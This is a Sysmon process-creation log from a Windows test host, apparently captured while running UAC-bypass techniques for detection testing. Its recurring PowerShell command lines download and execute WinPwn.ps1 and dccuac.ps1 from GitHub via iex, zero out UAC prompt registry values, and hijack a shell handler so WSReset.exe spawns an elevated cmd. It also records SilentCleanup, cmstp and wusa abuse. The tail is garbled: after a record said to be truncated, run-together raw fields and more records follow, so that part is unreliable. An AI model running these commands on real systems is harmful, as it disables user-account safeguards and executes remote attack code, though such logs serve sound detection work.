Sysmon process-creation events (Event ID 1) exported from the Microsoft-Windows-Sysmon/Operational channel on host AttackBox-Win10, 2023-11-14, listed newest record first as on the page. The original export ran the XML fields together; they are separated below. Values common to every record: Version 5, Level 4, Task 1, Opcode 0, Keywords 0x8000000000000000, RuleName "-". The last record on the page is cut off after its User field and is shown as far as it survives.

Images seen (FileVersion; Description; Product; Company; OriginalFileName; Hashes). Each image carried the same values and hashes in every record in which it appears:

conhost.exe = C:\Windows\System32\conhost.exe: 10.0.17134.1 (WinBuild.160101.0800); Console Window Host; Microsoft® Windows® Operating System; Microsoft Corporation; CONHOST.EXE; SHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F
cmd.exe = C:\Windows\System32\cmd.exe: 10.0.17134.1 (WinBuild.160101.0800); Windows Command Processor; Microsoft® Windows® Operating System; Microsoft Corporation; Cmd.Exe; SHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE
powershell.exe = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: 10.0.17134.1 (WinBuild.160101.0800); Windows PowerShell; Microsoft® Windows® Operating System; Microsoft Corporation; PowerShell.EXE; SHA1=1B3B40FBC889FD4C645CC12C85D0805AC36BA254,MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
svchost.exe = C:\Windows\System32\svchost.exe: 10.0.17134.556 (WinBuild.160101.0800); Host Process for Windows Services; Microsoft® Windows® Operating System; Microsoft Corporation; svchost.exe; SHA1=C02EC813B2E6CBA92E1C72376850737DF204D4C5,MD5=0861726716C9610CE5F6BCF3F4858DA1,SHA256=29F04D5F4B8D798038CB9647178A8B9C68E16DC50DA850937F6E993FC7967B75,IMPHASH=E83C43A0A0660977831CA16F5521B0E0
WSReset.exe = C:\Windows\System32\WSReset.exe: 10.0.17134.1 (WinBuild.160101.0800); This tool resets the Windows Store without changing account settings or deleting installed apps; Microsoft® Windows® Operating System; Microsoft Corporation; WSReset.exe; SHA1=EB26BD2025006A1F633163CDBF0F3A70DB1DCF2C,MD5=BB45EE36EBDE5E91B7EB4B8C03D70B2C,SHA256=809DAAE3CBA364A125D3CFA6E59492CC83569C8F0DA94B629E9E6F1826F9F56E,IMPHASH=AB03184F9306BF7E8482C6F987BA1832
dllhost.exe = C:\Windows\System32\dllhost.exe: 10.0.17134.1 (WinBuild.160101.0800); COM Surrogate; Microsoft® Windows® Operating System; Microsoft Corporation; dllhost.exe; SHA1=257815EF5AC9E0408D327C5D1627D4C3795FF341,MD5=2528137C6745C4EADD87817A1909677E,SHA256=204FD3DA29E9197A7E82AB628E017A74082934E87092AFE18D253446608E0971,IMPHASH=68E651F131674892AE7E46556EB24726
consent.exe = C:\Windows\System32\consent.exe: 10.0.17134.677 (WinBuild.160101.0800); Consent UI for administrative applications; Microsoft® Windows® Operating System; Microsoft Corporation; consent.exe; SHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949
schtasks.exe = C:\Windows\System32\schtasks.exe: 10.0.17134.1 (WinBuild.160101.0800); Task Scheduler Configuration Tool; Microsoft® Windows® Operating System; Microsoft Corporation; schtasks.exe; SHA1=815A050FC4BD12C6CA0B62D38D0FB6F8A95F70A8,MD5=838D346D1D28F00783B7A6C6BD03A0DA,SHA256=8BE433049CCC271F04A8E625E9FB9BD3BCF15B4EDEB63497C00BD9CE1CD5C50E,IMPHASH=7EE4BC5589713B3470B8A950256E2E69
cvtres.exe = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe: 12.00.52519.0 built by: VSWINSERVICING; Microsoft® Resource File To COFF Object Conversion Utility; Microsoft® .NET Framework; Microsoft Corporation; CVTRES.EXE; SHA1=76C1219AF982CDFD4C2ED915EB4AE0EE99895C01,MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF
csc.exe = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe: 4.7.3056.0 built by: NET472REL1; Visual C# Command Line Compiler; Microsoft® .NET Framework; Microsoft Corporation; csc.exe; SHA1=311F2313016303A7B0296FCFA1E821905FF84304,MD5=B46100977911A0C9FB1C3E5F16A5017D,SHA256=DB58611DD100D2280FAD9BB38982FC287A46C42DD8C2F5C964C5796AB9371FE6,IMPHASH=9C5140449778B9B7CEF1476457A218C0
cmstp.exe = C:\Windows\System32\cmstp.exe: 7.2.17134.1 (WinBuild.160101.0800); Microsoft Connection Manager Profile Installer; Microsoft(R) Connection Manager; Microsoft Corporation; CMSTP.EXE; SHA1=84AA48946D4F9A9DFE4C1AF6F96C44B643229A73,MD5=2A9828E0C405422D166E0141054A04B3,SHA256=94152FB98573FE31C0CE49D260D760DD173741D663414DE718A37AAC7E8EF11F,IMPHASH=109BA8ED3C458360A74EA1216207CA09
wusa.exe = C:\Windows\System32\wusa.exe: 10.0.17134.1 (WinBuild.160101.0800); Windows Update Standalone Installer; Microsoft® Windows® Operating System; Microsoft Corporation; wusa.exe; SHA1=76FA00103A89C735573D1D8946D8787A839475B6,MD5=04CE745559916B99248F266BBF5F9ED9,SHA256=1D86701A861FFA88FE050A466E04281A4809C334B16832A84231DC6A5FBC4195,IMPHASH=FC972ECD133FF77EF8CFBA8B3DF03C97

Long PowerShell command lines that recur in the records (quoted exactly as exported, including the \"" escapes):

[CL-1] "powershell.exe" & {Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 0 -Type Dword -Force}
[CL-2] "powershell.exe" & {New-Item HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command -Force | Out-Null New-ItemProperty -Path HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command -Name \""DelegateExecute\"" -Value \""\"" -Force | Out-Null Set-ItemProperty -Path HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command -Name \""(default)\"" -Value \""C:\Windows\System32\cmd.exe /c start cmd.exe\"" -Force -ErrorAction SilentlyContinue | Out-Null $Process = Start-Process -FilePath \""C:\Windows\System32\WSReset.exe\"" -WindowStyle Hidden}
[CL-3] "powershell.exe" & {$orgValue =(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin).ConsentPromptBehaviorAdmin Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0 -Type Dword -Force}
[CL-4] "powershell.exe" & {iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/dccuac.ps1')}
[CL-5] "powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command \""C:\windows\system32\cmd.exe\"" -technique DiskCleanup}
[CL-6] "powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command \""C:\windows\system32\calc.exe\"" -technique ccmstp}
[CL-7] "powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command \""C:\windows\system32\cmd.exe\"" -technique magic}

Records. Column order:
EventRecordID | UtcTime | ProcessGuid | ProcessId | Image | CommandLine | CurrentDirectory | User | LogonGuid | LogonId | TerminalSessionId | IntegrityLevel | ParentProcessGuid | ParentProcessId | ParentImage | ParentCommandLine | ParentUser

688360 | 2023-11-14 01:05:32.070 | {51A89197-C7DC-6552-9603-000000001E00} | 480 | conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-56D8-010000000000} | 0x1d856 | 1 | High | {51A89197-C7DC-6552-9503-000000001E00} | 6708 | cmd.exe | cmd.exe | ATTACKBOX-WIN10\VICTIM
688351 | 2023-11-14 01:05:32.054 | {51A89197-C7DC-6552-9503-000000001E00} | 6708 | cmd.exe | cmd.exe | C:\Windows\system32\ | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-56D8-010000000000} | 0x1d856 | 1 | High | {51A89197-C7DB-6552-9303-000000001E00} | 7656 | cmd.exe | "C:\Windows\System32\cmd.exe" /c start cmd.exe | ATTACKBOX-WIN10\VICTIM
688309 | 2023-11-14 01:05:31.963 | {51A89197-C7DB-6552-9403-000000001E00} | 4924 | conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-56D8-010000000000} | 0x1d856 | 1 | High | {51A89197-C7DB-6552-9303-000000001E00} | 7656 | cmd.exe | "C:\Windows\System32\cmd.exe" /c start cmd.exe | ATTACKBOX-WIN10\VICTIM
688271 | 2023-11-14 01:05:31.928 | {51A89197-C7DB-6552-9303-000000001E00} | 7656 | cmd.exe | "C:\Windows\System32\cmd.exe" /c start cmd.exe | C:\Windows\system32\ | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-56D8-010000000000} | 0x1d856 | 1 | High | {51A89197-C7DA-6552-8E03-000000001E00} | 7492 | WSReset.exe | "C:\Windows\System32\WSReset.exe" | ATTACKBOX-WIN10\VICTIM
688005 | 2023-11-14 01:05:30.840 | {51A89197-C7DA-6552-9203-000000001E00} | 856 | conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-96D8-010000000000} | 0x1d896 | 1 | Medium | {51A89197-C7DA-6552-9103-000000001E00} | 5552 | powershell.exe | [CL-1] | ATTACKBOX-WIN10\VICTIM
687997 | 2023-11-14 01:05:30.828 | {51A89197-C7DA-6552-9103-000000001E00} | 5552 | powershell.exe | [CL-1] | C:\Users\VICTIM\AppData\Local\Temp\ | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-96D8-010000000000} | 0x1d896 | 1 | Medium | {51A89197-C74B-6552-9C02-000000001E00} | 6296 | powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" | ATTACKBOX-WIN10\VICTIM
687859 | 2023-11-14 01:05:30.401 | {51A89197-C7DA-6552-9003-000000001E00} | 2476 | svchost.exe | C:\Windows\System32\svchost.exe -k wsappx -p | C:\Windows\system32\ | NT AUTHORITY\SYSTEM | {51A89197-BE59-6552-E703-000000000000} | 0x3e7 | 0 | System | {51A89197-BE59-6552-0B00-000000001E00} | 596 | C:\Windows\System32\services.exe | C:\Windows\system32\services.exe | NT AUTHORITY\SYSTEM
687700 | 2023-11-14 01:05:30.152 | {51A89197-C7DA-6552-8F03-000000001E00} | 5796 | conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-56D8-010000000000} | 0x1d856 | 1 | High | {51A89197-C7DA-6552-8E03-000000001E00} | 7492 | WSReset.exe | "C:\Windows\System32\WSReset.exe" | ATTACKBOX-WIN10\VICTIM
687691 | 2023-11-14 01:05:30.136 | {51A89197-C7DA-6552-8E03-000000001E00} | 7492 | WSReset.exe | "C:\Windows\System32\WSReset.exe" | C:\Windows\system32\ | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-56D8-010000000000} | 0x1d856 | 1 | High | {51A89197-C7D8-6552-8803-000000001E00} | 1148 | powershell.exe | [CL-2] | ATTACKBOX-WIN10\VICTIM
687662 | 2023-11-14 01:05:30.099 | {51A89197-C7DA-6552-8D03-000000001E00} | 7756 | dllhost.exe | C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | C:\Windows\system32\ | NT AUTHORITY\SYSTEM | {51A89197-BE59-6552-E703-000000000000} | 0x3e7 | 0 | System | {51A89197-BE59-6552-0F00-000000001E00} | 756 | svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p | NT AUTHORITY\SYSTEM
687619 | 2023-11-14 01:05:30.011 | {51A89197-C7DA-6552-8C03-000000001E00} | 6940 | dllhost.exe | C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | C:\Windows\system32\ | NT AUTHORITY\SYSTEM | {51A89197-BE59-6552-E703-000000000000} | 0x3e7 | 1 | System | {51A89197-BE59-6552-0F00-000000001E00} | 756 | svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p | NT AUTHORITY\SYSTEM
687352 | 2023-11-14 01:05:29.880 | {51A89197-C7D9-6552-8B03-000000001E00} | 7372 | consent.exe | consent.exe 368 312 0000025DF46EFE00 | C:\Windows\system32\ | NT AUTHORITY\SYSTEM | {51A89197-BE59-6552-E703-000000000000} | 0x3e7 | 1 | System | {51A89197-BE5A-6552-1300-000000001E00} | 368 | svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p | NT AUTHORITY\SYSTEM
687341 | 2023-11-14 01:05:29.863 | {51A89197-C7D9-6552-8A03-000000001E00} | 6308 | WSReset.exe | "C:\Windows\System32\WSReset.exe" | C:\DetectionTesting\ | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-96D8-010000000000} | 0x1d896 | 1 | Medium | {51A89197-C7D8-6552-8803-000000001E00} | 1148 | powershell.exe | [CL-2] | ATTACKBOX-WIN10\VICTIM
687192 | 2023-11-14 01:05:28.918 | {51A89197-C7D8-6552-8903-000000001E00} | 8128 | conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-96D8-010000000000} | 0x1d896 | 1 | Medium | {51A89197-C7D8-6552-8803-000000001E00} | 1148 | powershell.exe | [CL-2] | ATTACKBOX-WIN10\VICTIM
687186 | 2023-11-14 01:05:28.906 | {51A89197-C7D8-6552-8803-000000001E00} | 1148 | powershell.exe | [CL-2] | C:\Users\VICTIM\AppData\Local\Temp\ | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-96D8-010000000000} | 0x1d896 | 1 | Medium | {51A89197-C74B-6552-9C02-000000001E00} | 6296 | powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" | ATTACKBOX-WIN10\VICTIM
687024 | 2023-11-14 01:05:27.481 | {51A89197-C7D7-6552-8703-000000001E00} | 7548 | conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-96D8-010000000000} | 0x1d896 | 1 | Medium | {51A89197-C7D7-6552-8603-000000001E00} | 7348 | powershell.exe | [CL-3] | ATTACKBOX-WIN10\VICTIM
687018 | 2023-11-14 01:05:27.469 | {51A89197-C7D7-6552-8603-000000001E00} | 7348 | powershell.exe | [CL-3] | C:\Users\VICTIM\AppData\Local\Temp\ | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-96D8-010000000000} | 0x1d896 | 1 | Medium | {51A89197-C74B-6552-9C02-000000001E00} | 6296 | powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" | ATTACKBOX-WIN10\VICTIM
686803 | 2023-11-14 01:05:25.768 | {51A89197-C7D5-6552-8503-000000001E00} | 6648 | conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-96D8-010000000000} | 0x1d896 | 1 | Medium | {51A89197-C7D5-6552-8403-000000001E00} | 7712 | powershell.exe | [CL-4] | ATTACKBOX-WIN10\VICTIM
686797 | 2023-11-14 01:05:25.757 | {51A89197-C7D5-6552-8403-000000001E00} | 7712 | powershell.exe | [CL-4] | C:\Users\VICTIM\AppData\Local\Temp\ | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-96D8-010000000000} | 0x1d896 | 1 | Medium | {51A89197-C74B-6552-9C02-000000001E00} | 6296 | powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" | ATTACKBOX-WIN10\VICTIM
686644 | 2023-11-14 01:05:22.883 | {51A89197-C7D2-6552-8303-000000001E00} | 1032 | conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-56D8-010000000000} | 0x1d856 | 1 | High | {51A89197-C7D2-6552-8203-000000001E00} | 5680 | cmd.exe | C:\windows\system32\cmd.exe && REM\system32\cleanmgr.exe /autoclean /d C: | ATTACKBOX-WIN10\VICTIM
686590 | 2023-11-14 01:05:22.740 | {51A89197-C7D2-6552-8203-000000001E00} | 5680 | cmd.exe | C:\windows\system32\cmd.exe && REM\system32\cleanmgr.exe /autoclean /d C: | C:\Windows\system32\ | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-56D8-010000000000} | 0x1d856 | 1 | High | {51A89197-BE5A-6552-1300-000000001E00} | 368 | svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p | NT AUTHORITY\SYSTEM
686371 | 2023-11-14 01:05:22.406 | {51A89197-C7D2-6552-8103-000000001E00} | 4052 | conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-96D8-010000000000} | 0x1d896 | 1 | Medium | {51A89197-C7D2-6552-8003-000000001E00} | 2988 | schtasks.exe | "C:\Windows\system32\schtasks.exe" /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I | ATTACKBOX-WIN10\VICTIM
686363 | 2023-11-14 01:05:22.386 | {51A89197-C7D2-6552-8003-000000001E00} | 2988 | schtasks.exe | "C:\Windows\system32\schtasks.exe" /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I | C:\DetectionTesting\ | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-96D8-010000000000} | 0x1d896 | 1 | Medium | {51A89197-C7D0-6552-7E03-000000001E00} | 612 | powershell.exe | [CL-5] | ATTACKBOX-WIN10\VICTIM
686100 | 2023-11-14 01:05:20.436 | {51A89197-C7D0-6552-7F03-000000001E00} | 8000 | conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-96D8-010000000000} | 0x1d896 | 1 | Medium | {51A89197-C7D0-6552-7E03-000000001E00} | 612 | powershell.exe | [CL-5] | ATTACKBOX-WIN10\VICTIM
686094 | 2023-11-14 01:05:20.420 | {51A89197-C7D0-6552-7E03-000000001E00} | 612 | powershell.exe | [CL-5] | C:\Users\VICTIM\AppData\Local\Temp\ | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-96D8-010000000000} | 0x1d896 | 1 | Medium | {51A89197-C74B-6552-9C02-000000001E00} | 6296 | powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" | ATTACKBOX-WIN10\VICTIM
685975 | 2023-11-14 01:05:19.818 | {51A89197-C7CF-6552-7D03-000000001E00} | 6464 | cvtres.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\VICTIM\AppData\Local\Temp\RES1355.tmp" "c:\Users\VICTIM\AppData\Local\Temp\CSCF1FA2C77750C47DBAD8EEF3490134B23.TMP" | C:\Users\VICTIM\AppData\Local\Temp\ | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-96D8-010000000000} | 0x1d896 | 1 | Medium | {51A89197-C7CF-6552-7B03-000000001E00} | 3056 | csc.exe | "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\VICTIM\AppData\Local\Temp\dnj2cx2y.cmdline" | ATTACKBOX-WIN10\VICTIM
685861 | 2023-11-14 01:05:19.670 | {51A89197-C7CF-6552-7C03-000000001E00} | 3364 | dllhost.exe | C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | C:\Windows\system32\ | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-56D8-010000000000} | 0x1d856 | 1 | High | {51A89197-BE59-6552-0F00-000000001E00} | 756 | svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p | NT AUTHORITY\SYSTEM
685842 | 2023-11-14 01:05:19.644 | {51A89197-C7CF-6552-7B03-000000001E00} | 3056 | csc.exe | "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\VICTIM\AppData\Local\Temp\dnj2cx2y.cmdline" | C:\Users\VICTIM\AppData\Local\Temp\ | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-96D8-010000000000} | 0x1d896 | 1 | Medium | {51A89197-C7CD-6552-7703-000000001E00} | 7724 | powershell.exe | [CL-6] | ATTACKBOX-WIN10\VICTIM
685415 | 2023-11-14 01:05:19.446 | {51A89197-C7CF-6552-7A03-000000001E00} | 3184 | consent.exe | consent.exe 368 354 0000025DF26E2720 | C:\Windows\system32\ | NT AUTHORITY\SYSTEM | {51A89197-BE59-6552-E703-000000000000} | 0x3e7 | 1 | System | {51A89197-BE5A-6552-1300-000000001E00} | 368 | svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p | NT AUTHORITY\SYSTEM
685138 | 2023-11-14 01:05:19.267 | {51A89197-C7CF-6552-7903-000000001E00} | 6520 | cmstp.exe | "c:\windows\system32\cmstp.exe" /au C:\Users\VICTIM\AppData\Local\Temp\CMSTP.inf | C:\Users\VICTIM\AppData\Local\Temp\ | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-96D8-010000000000} | 0x1d896 | 1 | Medium | {51A89197-C7CD-6552-7703-000000001E00} | 7724 | powershell.exe | [CL-6] | ATTACKBOX-WIN10\VICTIM
684971 | 2023-11-14 01:05:17.638 | {51A89197-C7CD-6552-7803-000000001E00} | 3976 | conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-96D8-010000000000} | 0x1d896 | 1 | Medium | {51A89197-C7CD-6552-7703-000000001E00} | 7724 | powershell.exe | [CL-6] | ATTACKBOX-WIN10\VICTIM
684965 | 2023-11-14 01:05:17.629 | {51A89197-C7CD-6552-7703-000000001E00} | 7724 | powershell.exe | [CL-6] | C:\Users\VICTIM\AppData\Local\Temp\ | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-96D8-010000000000} | 0x1d896 | 1 | Medium | {51A89197-C74B-6552-9C02-000000001E00} | 6296 | powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" | ATTACKBOX-WIN10\VICTIM
684872 | 2023-11-14 01:05:17.164 | {51A89197-C7CD-6552-7603-000000001E00} | 772 | conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows | ATTACKBOX-WIN10\VICTIM | {51A89197-C7CD-6552-080E-C70000000000} | 0xc70e08 | 1 | High | {51A89197-C7CD-6552-7503-000000001E00} | 5344 | cmd.exe | "C:\windows\system32\cmd.exe" | ATTACKBOX-WIN10\VICTIM
684865 | 2023-11-14 01:05:17.155 | {51A89197-C7CD-6552-7503-000000001E00} | 5344 | cmd.exe | "C:\windows\system32\cmd.exe" | C:\Windows\ | ATTACKBOX-WIN10\VICTIM | {51A89197-C7CD-6552-080E-C70000000000} | 0xc70e08 | 1 | High | {51A89197-C7C8-6552-6C03-000000001E00} | 2756 | powershell.exe | [CL-7] | ATTACKBOX-WIN10\VICTIM
684784 | 2023-11-14 01:05:16.851 | {51A89197-C7CC-6552-7403-000000001E00} | 7088 | wusa.exe | "C:\Windows\System32\wusa.exe" | C:\Windows\system32\ | ATTACKBOX-WIN10\VICTIM | {51A89197-BE5E-6552-56D8-010000000000} | 0x1d856 | 1 | High | {51A89197-C7C8-6552-6C03-000000001E00} | 2756 | powershell.exe | [CL-7] | ATTACKBOX-WIN10\VICTIM
684755 | 2023-11-14 01:05:16.785 | {51A89197-C7CC-6552-7303-000000001E00} | 2380 | dllhost.exe | C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | C:\Windows\system32\ | NT AUTHORITY\SYSTEM | {51A89197-BE59-6552-E703-000000000000} | 0x3e7 | 0 | System | {51A89197-BE59-6552-0F00-000000001E00} | 756 | svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p | NT AUTHORITY\SYSTEM
684712 | 2023-11-14 01:05:16.711 | {51A89197-C7CC-6552-7203-000000001E00} | 5608 | dllhost.exe | C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | C:\Windows\system32\ | NT AUTHORITY\SYSTEM | {51A89197-BE59-6552-E703-000000000000} | 0x3e7 | 1 | System | {51A89197-BE59-6552-0F00-000000001E00} | 756 | svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p | NT AUTHORITY\SYSTEM
684466 | 2023-11-14 01:05:16.579 | {51A89197-C7CC-6552-7103-000000001E00} | 2552 | consent.exe | consent.exe 368 294 0000025DF47437E0 | C:\Windows\system32\ | NT (record truncated on the page; the remaining fields are absent)
AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000684433Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:16.555{51A89197-C7CC-6552-7003-000000001E00}8060C:\Windows\System32\wusa.exe10.0.17134.1 (WinBuild.160101.0800)Windows Update Standalone InstallerMicrosoft® Windows® Operating SystemMicrosoft Corporationwusa.exe"C:\Windows\System32\wusa.exe" C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=76FA00103A89C735573D1D8946D8787A839475B6,MD5=04CE745559916B99248F266BBF5F9ED9,SHA256=1D86701A861FFA88FE050A466E04281A4809C334B16832A84231DC6A5FBC4195,IMPHASH=FC972ECD133FF77EF8CFBA8B3DF03C97{51A89197-C7C8-6552-6C03-000000001E00}2756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command \""C:\windows\system32\cmd.exe\"" -technique magic}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000684391Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:16.310{51A89197-C7CC-6552-6F03-000000001E00}6292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\VICTIM\AppData\Local\Temp\RES5A9.tmp" 
